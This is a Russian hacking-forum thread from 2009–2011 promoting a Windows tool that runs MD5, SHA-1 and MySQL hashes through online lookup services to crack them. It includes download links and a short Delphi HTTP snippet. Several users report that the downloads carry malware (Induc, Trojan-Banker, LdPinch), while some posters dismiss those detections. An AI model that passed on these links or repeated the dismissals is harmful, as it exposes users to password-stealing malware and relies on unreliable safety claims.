ArxFuckingHash2 - Crack md5, sha1, mysql hash [Обновление]

Discussion in 'Безопасность и Анонимность' started by ArxWolf, 27 Jul 2009.

  1. ArxWolf

    ArxWolf Elder - Старейшина

    Joined:
    29 Feb 2008
    Messages:
    38
    Likes Received:
    29
    Reputations:
    0
    RUSSIAN VERSION

    [​IMG]

    Нашли хэш?
    Будете прогонять его по online сервисам?
    Теперь это стало на много проще!
    Скачайте программу ArxFuckingHash, введите hash (md5, Mysql, Sha1) и запустите, программа сама пройдёт по списку открытых сервисов и сделает парсинг, потом выведет вам результат в удобной форме.

    Преимущества:
    - Работа в 10 потоках (проверка по 10 сервисам сразу).
    - Поиск md5, sha1, mysql.
    - Возможность самому редактировать конфиг серверов (servers.ini), т.е можно составить свой список.
    - Программа имеет удобный, красивый интерфейс.
    - Поиск сразу нескольких hash (добавляете в список).
    - Создать md5 строки, или файла.
    - Встроенный чекер рабочих и не рабочих сервисов / параметров.
    - Возможность в online режиме редактировать параметры сервисов, видя сразу web страницу и исходный код.
    - Так же в папке help, лежит файл помощи по редактированию параметров сервиса.

    Поддерживаются типы hash:
    - Md5
    - Sha-1
    - MySQL

    Обновления второй версии:
    - Добавлено 3 новых MD5 сервиса, теперь их 28!
    - Теперь можно создать не только MD5 хеш, но и SHA1, CRC
    - Новая система определения типа хеша
    - Теперь программа не только на Русском, но и на Английском языке
    - Перевод программы находиться в отдельном файле, что даёт возможность перевести программа на любой язык
    - Исправлена пара ошибок

    Скачать:
    http://depositfiles.com/files/9gx0vr7zk
    http://rghost.ru/363643
    http://rapidshare.com/files/259434537/ArxFuckingHash2.rar.html


    ENGLISH VERSION

    [​IMG]
    Got a hash?
    Will chase it for online services?
    Now it has become much easier!
    Download ArxFuckingHash, enter hash (md5, Mysql, Sha1) and run the program itself will take place on the list of public services and make the parsing, then you display the result in a convenient form.

    Advantages:
    - Work in 10 streams (10 to check services at once).
    - Search for md5, sha1, mysql.
    - Ability to edit the configuration of servers (servers.ini), ie you can compile your own list.
    - The program has a convenient, attractive interface.
    - Search multiple hash (adding to the list).
    - Create a md5 string, or file.
    - Built-checker working and not working services / settings.
    - Ability to edit mode, online services, see web page at once, and the source code.
    - Also in the folder, help, help file is for editing the parameters of service.

    Supported types of hash:
    - Md5
    - Sha-1
    - MySQL

    Updates Second Edition:
    - Added 3 new MD5 service, now 28!
    - Now you can create not only the MD5 hash, and SHA1, CRC
    - A new system for determining the type of hash
    - Now the program is not only in Russian but in English
    - Transfer the program to be in a separate file, which makes it possible to translate the program into any language
    - Fixed a couple of mistakes

    In the folder is a file 'english.txt', to translate to English language, just
    rename the file 'english.txt' on 'active.txt'.

    Download:
    http://depositfiles.com/files/9gx0vr7zk
    http://rghost.ru/363643
    http://rapidshare.com/files/259434537/ArxFuckingHash2.rar.html
     
    3 people like this.
  2. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    ArxWolf, при всем уважении...
    что значит строка
    Code:
    Ikarus	T3.1.1.64.0	2009.07.27	Trojan-Banker.Win32.Banker
    при анализе твоей софтины на сайте virustotal?

    у меня, в обшем-то есть и самописный, однотредовый чеккер по некоторым сервисам. Тоже писал на Делфи.
    Заморачиваться с ним, добовлять многопоточность и.т.д особого желания нет, т.к. есть"альтернативные" пути массвого пробива до 10к хешей в день по всем функционирующим на данный момент сервисам.
    НО - это я к тому, что совершенно чётко представляю, как оно на делфи работает.

    На что именно в твоей реализации ругается этот никому не известный "Икарус"?

    ну и добавлю:
    очень уж неудобно добавлять по 1 хешу.
    Если нужно пробить сразу 10 - уже напрягает. Про сотню я вообще молчу.
    Если бы была поддержка пробива списка хешей из файла + было по-больше сервисов (не спрашивай каких у тебя нет, но у тебя не все) + была бы полная уверенность в отсутствии в коде дополнительной приправы - я бы (говорю лично за себя) - например пользовался.

    Думаю, раз уж софтина полностью фривар + всё, что тебе от неё нужно - известность твоего ресурса, уважение к тебе как к кодеру и админу - быть может стоило бы выложить - ну пусть даже с некоторыми "вырезанными" частями - и её исходники?
    А можно было бы и полностью.
    Новички бы в любом случае юзали твою компиляцию, а кто-то из тех, кто работает с хешами часто - быть может где-то что-то добавив или немного изменив "под себя" - использовал бы в качестве "рабочего" инструмента

    Дело твоё, не прими это как критику или что-то в этом роде.
    Просто моё личное мнение, как человека, весьма нередко имеющего дело с различными алгоритмами шифрования.

    обнов.:
    когда в прошлый раз проверял твою прогу(хотел было установить), видимо прсто не дождался до конца теста. Сейчас, когда закрывал вкладку вирустотала, заметил что еще один антивирус определил у тебя там того же самого троя.
    не хорошо как-то получается, не находишь?
    Code:
    a-squared 	4.5.0.24 	2009.07.27 	Trojan-Banker.Win32.Banker!IK
     
    #2 ErrorNeo, 27 Jul 2009
    Last edited: 27 Jul 2009
  3. ArxWolf

    ArxWolf Elder - Старейшина

    Joined:
    29 Feb 2008
    Messages:
    38
    Likes Received:
    29
    Reputations:
    0
    Прогу писал самолично и на 100% отвечаю что не чего нету =)
    Тем более она выложена у нас на проекте, а я уж тем более не будут своих людей обманывать.

    И ты наверное забыл погуглить тот глюк с троем.
    Даже к примеру вот http://www.securelist.com/ru/descriptions/97827/Trojan-Banker.Win32.Banker.z

    Всё что там написанно про него, не делает программа =) Вывод, что там нету трояна.
    Не веришь? Флаг в руки + нех редактор + сниффер локальный + отследи изменения реестра и отследи изменения файловой системы.
     
  4. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    хотел было с тобой поспорить но не стану:)
    хотя и ссылку ты вовсе не ту показал да и вобще... ну в общем неважно. забей :p

    кстати, какую компоненту ты использовал?


    edit:
    поставил плюс за глюк. Написать то же самое без глюка - муторно, но совершенно не сложно.
    А вот написать такой глюк я пока что хоть даже и захочу не сумею :'(
     
    #4 ErrorNeo, 27 Jul 2009
    Last edited: 3 Sep 2009
  5. ArxWolf

    ArxWolf Elder - Старейшина

    Joined:
    29 Feb 2008
    Messages:
    38
    Likes Received:
    29
    Reputations:
    0
    Нет компонента нету, все сетевые програмы всегда пишу на низком уровне, на winsock.

    Ну вот к примеру:
    Code:
    data := str_replace('{HASH}',_hash,_post);
    get:= data;
    if _method='POST' then get:='';
    req :=
    _method+' /'+_url+get+' HTTP/1.0'+#13#10+
    'Host: '+_server+#13#10+
    'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5'+#13#10+
    'Accept-Language: ru'+#13#10+
    'Accept: */*'+#13#10+
    'Cookie: remix'+#13#10+
    'Content-Length: '+inttostr(length(data))+#13#10+
    'Content-Type: application/x-www-form-urlencoded'+#13#10+
    'Connection: Close'+#13#10+#13#10+data+#13#10+#13#10;
    
     
  6. FUTURiTY

    FUTURiTY New Member

    Joined:
    12 Aug 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    ErrorNeo
    А можно поподробнее об этом сервисе? :cool:
    Если не сложно.
     
  7. 0ctave

    0ctave Member

    Joined:
    9 Jul 2009
    Messages:
    6
    Likes Received:
    8
    Reputations:
    0
    М-дааа, сочувствую тем дельфи-программерам, кто скачал:
    http://www.virustotal.com/ru/analisis/faaeae70bbc0f86a9c8cbe667c4b64c07c13fd9c67c21384c2893505c80d2576-1252311770
    Induc и сюда пробрался)
     
  8. 0ctave

    0ctave Member

    Joined:
    9 Jul 2009
    Messages:
    6
    Likes Received:
    8
    Reputations:
    0
    +1, тоже хотелось бы узнать)
     
  9. ArxWolf

    ArxWolf Elder - Старейшина

    Joined:
    29 Feb 2008
    Messages:
    38
    Likes Received:
    29
    Reputations:
    0
    Да :) ну что поделать, в следующий раз буду внимательнее.
    Вирус уже удалил давно, так что в новой версии всё будет хорошо :eek:
     
  10. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
    А новая версия когда будет?
     
  11. IamDevil

    IamDevil New Member

    Joined:
    10 May 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    скачал, а там Индюк. специально ведь вырубил антивирь... ваще жесть, нельзя перекомпилить без этой фигни? и в топике написать, что вирус тут раздаешь всем?
     
  12. ArxWolf

    ArxWolf Elder - Старейшина

    Joined:
    29 Feb 2008
    Messages:
    38
    Likes Received:
    29
    Reputations:
    0
    Приношу извинение.
    На момент написания темы, этот вирус ещё не палился.
    Уже вышла новая 3 версия, чистая ArxFuckingHash3, искать в гугле.
     
  13. GringPiN

    GringPiN Banned

    Joined:
    20 May 2010
    Messages:
    11
    Likes Received:
    7
    Reputations:
    1
    [​IMG]

    Нашли хэш (hash)?
    Будете прогонять его по online сервисам?
    Теперь это стало на много проще!
    Скачайте программу ArxFuckingHash, введите hash (md5, Mysql, Sha1) и запустите, программа сама пройдёт по списку открытых сервисов и сделает парсинг, потом выведет вам результат в удобной форме.

    Функционал:
    - Работа в 10 потоках (проверка по 10 сервисам сразу).
    - Поиск md5, sha1, mysql.
    - Возможность самому редактировать конфиг сервисов (servers.ini), т.е можно составить свой список.
    - Программа имеет удобный, красивый интерфейс.
    - Поиск сразу нескольких hash (добавляете в список).
    - Загрузка хешей из файла.
    - При массовом добавлении хешей, работает модуль 'Авто-определение типа хеша'.
    - Сохранение результата.
    - Модуль создания md5 строки или файла, а так же SHA1, CRC32.
    - Встроенный чекер рабочих и не рабочих сервисов / параметров.
    - Модуль редактора сервисов, для редактирование сервисов и для проверки их работоспособности.
    - В папке help находится файл помощи.
    - Модуль определения типа хеша, точность на 80%
    - Модуль парсинга текста, теперь вам не нужно будет напрягать ручки! Программа сделает всё за Вас.

    Исправлены ошибки:
    - Исправлен баг модуля 'Редактор сервисов', не правильно понимал GET запросы.
    - Проверен весь список сервисов, удалены мёртвые (2) и (2) с капчей, ну и фиг на них.

    Поддерживаются типы hash:
    - Md5
    - Sha-1
    - MySQL

    Обновлено (По сравнению со второй версией):
    - Добавлен модуль 'парсинг текста'
    - Кардинально изменён интерфейс главной
    - Обработан список сервисов
    - Добавлен модуль 'мульти-хеш', теперь добавляем не по одному хеши
    - Добавлено загрузка хешей из файла
    - Добавлено сохранение результата
    - Исправлен баг модуля 'Редактор сервисов'
    - Вес программы уменьшен в два раза
    - Из за того что один сервис сделал результат в base64, в программу
    был встроен модуль декодирования base64, читайте в help/help_servers_ini.html

    Проверка на вирусы:
    File Info

    Report generated: 20.9.2009 at 5.05.53 (GMT 1)
    Filename: ArxFuckingHash.exe
    File size: 1426 KB
    MD5 Hash: 9adf75b929f5167edf1f96e5e30f1a2a
    SHA1 Hash: 14097DCF8DEF9BA11C6A2D3CDE3105D5A688D9CC
    Self-Extract Archive: Nothing found
    Binder Detector: Nothing found
    Detection rate: 2 on 23

    Detections

    a-squared - Trojan-Banker.Win32.Banker!IK
    Avira AntiVir - -
    Avast - -
    AVG - -
    BitDefender - -
    ClamAV - -
    Comodo - -
    Dr.Web - -
    Ewido - -
    F-PROT6 - -
    Ikarus T3 - Trojan-Banker.Win32.Banker
    Kaspersky - -
    McAfee - -
    NOD32 v3 - -
    Norman - -
    Panda - -
    QuickHeal - -
    Solo Antivirus - -
    Sophos - -
    TrendMicro - -
    VBA32 - -
    VirusBuster - -
    ZonerAntivirus - -

    Scan report generated by
    NoVirusThanks.org


    P.S Trojan-Banker.Win32.Banker - чушь полная )) говорят крадёт данные от банка )) Какой нафиг банк :13:

    Скачать:
    http://depositfiles.com/files/9spwt6k9u
    http://depositfiles.com/files/pzoz801gd
    http://openfile.ru/401573/
    http://fileshare.in.ua/2798277
    http://rghost.ru/472392
    http://www.getthebit.com/f/erq/adiaaaaalaabiaaa/dde_upload.rar.html
    http://openfile.ru/401579/
    http://rapidshare.com/files/282454177/Upload.rar.html
    http://fileshare.in.ua/2798459
     
    1 person likes this.
  14. Anarh1st

    Anarh1st Member

    Joined:
    19 May 2010
    Messages:
    32
    Likes Received:
    5
    Reputations:
    0
    Сделай обновление базы сервисов через сайт :)

    P.s. Видел, что на хакере выложили его? (в самом журнале)

    За софт спасибо.
     
  15. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    Да толку через сайт делать, там если что в файле .ini можно добавить.
     
  16. Alt

    Alt New Member

    Joined:
    17 Jun 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    БУДЬТЕ АККУРАТНЫ! В ВЫЛОЖЕНЫХ ССЫЛКАХ от GringPiN ПИНЧ!


    Antivirus Version Last Update Result
    AhnLab-V3 2011.03.12.00 2011.03.11 -
    AntiVir 7.11.4.177 2011.03.12 TR/PSW.LdPinch.apyj
    Antiy-AVL 2.0.3.7 2011.03.12 Trojan/Win32.LdPinch.gen
    Avast 4.8.1351.0 2011.03.12 -
    Avast5 5.0.677.0 2011.03.12 -
    BitDefender 7.2 2011.03.12 -
    CAT-QuickHeal 11.00 2011.03.12 TrojanPSW.LdPinch.apyj
    ClamAV 0.96.4.0 2011.03.12 -
    Commtouch 5.2.11.5 2011.03.12 -
    Comodo 7953 2011.03.12 -
    Emsisoft 5.1.0.2 2011.03.12 -
    eSafe 7.0.17.0 2011.03.10 Win32.Artemis
    eTrust-Vet 36.1.8211 2011.03.11 -
    F-Prot 4.6.2.117 2011.03.12 -
    F-Secure 9.0.16440.0 2011.03.12 -
    Fortinet 4.2.254.0 2011.03.12 -
    GData 21 2011.03.12 -
    Ikarus T3.1.1.97.0 2011.03.12 -
    Jiangmin 13.0.900 2011.03.12 Trojan/PSW.LdPinch.zgq
    K7AntiVirus 9.93.4087 2011.03.11 -
    Kaspersky 7.0.0.125 2011.03.12 Trojan-PSW.Win32.LdPinch.apyj
    McAfee 5.400.0.1158 2011.03.12 Artemis!D250456D3D58
    McAfee-GW-Edition 2010.1C 2011.03.11 Artemis!D250456D3D58
    Microsoft 1.6603 2011.03.12 -
    NOD32 5947 2011.03.12 -
    Norman 6.07.03 2011.03.12 -
    nProtect 2011-02-10.01 2011.02.15 Trojan-PWS/W32.LdPinch.636416
    Panda 10.0.3.5 2011.03.11 -
    PCTools 7.0.3.5 2011.03.11 -
    Prevx 3.0 2011.03.12 -
    Rising 23.48.05.03 2011.03.12 Trojan.Win32.Generic.1275420A
    Sophos 4.63.0 2011.03.12 -
    SUPERAntiSpyware 4.40.0.1006 2011.03.12 -
    TheHacker 6.7.0.1.147 2011.03.11 Trojan/PSW.LdPinch.apyj
    TrendMicro 9.200.0.1012 2011.03.12 -
    VBA32 3.12.14.3 2011.03.11 TrojanPSW.Pinch.apyj
    ViRobot 2011.3.12.4354 2011.03.12 Backdoor.Win32.S.Agent.636416.C
    VirusBuster 13.6.246.3 2011.03.11 Trojan.PWS.LdPinch!yd+dAfgwD1k
     
  17. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    Как закрылся вебхакер, все версии стали палится как пинч. Но поскольку все они были проверены, опасаться нечего. Последнюю версию софта можно скачать здесь:

    https://forum.antichat.net/showpost.php?p=2542786&postcount=7